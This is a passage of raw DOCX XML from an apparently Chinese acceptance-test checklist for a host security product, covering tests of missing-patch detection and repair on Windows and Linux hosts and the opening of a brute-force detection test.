              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang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cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>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3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc20883"/>
      <w:bookmarkStart w:id="90" w:name="_Toc959713887"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险监测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc8577"/>
      <w:bookmarkStart w:id="92" w:name="_Toc161626192"/>
      <w:r>
        <w:t>安全补丁检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及修复</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>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支持识别出现有系统中所缺失的安全补丁。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t>检查主机安全产品能否识别出主机上未安装的补丁，以及补丁的风险描述、验证信息、修复建议、漏洞利用原理、所影响业务、CVE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或KB</w:t>
            </w:r>
            <w:r>
              <w:t>信息，修复漏洞是否需要重启等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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机存在缺失的安全补丁</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Windows server2012</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>主机查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>“控制面板”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>“程序和功能”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>“查看已安装更新”中确认没有安装过KB4534309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25"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>可以对主机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Windows server2012</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>进行安全补丁扫描检查</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>等待扫描结束，查看体检结果</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Windows server2012</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>主机的系统漏洞，对扫描的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>KB4534309</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>补丁点击修复按钮，修复成功后登录主机查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>“控制面板”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>“程序和功能”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>“查看已安装更新”中是否包括相应</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>KB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>号的补丁</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>5．查看Oracle-76-01主机的系统漏洞，对扫描的CVE-2019-11811 Linux kernel 资源管理错误漏洞补丁点击修复按钮，修复成功后登录主机查看已安装的补丁，执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">rpm –qa |grep </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>python-perf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>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shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（步骤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）：能够识别出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>系统漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（步骤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）：能够识别出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>系统漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（步骤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>补丁修复成功，有包括KB4534309</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（步骤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>补丁修复成功，漏洞所影响的应用版本号应大于python-perf-3.10.0-957.el7.x86_64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识别Windows漏洞    口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">识别Linux漏洞      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>支持Windows漏洞修复  口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持Linux漏洞修复     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc25769"/>
      <w:bookmarkStart w:id="94" w:name="_Toc2032079136"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持暴力破解阈值设定，能够检测暴力破解行为，当发现暴力破解行为时，能够拉黑攻击IP。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rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>服务器上开放远程连接端口，安装暴力破解工具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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minor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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7805" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>登录服务端，</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
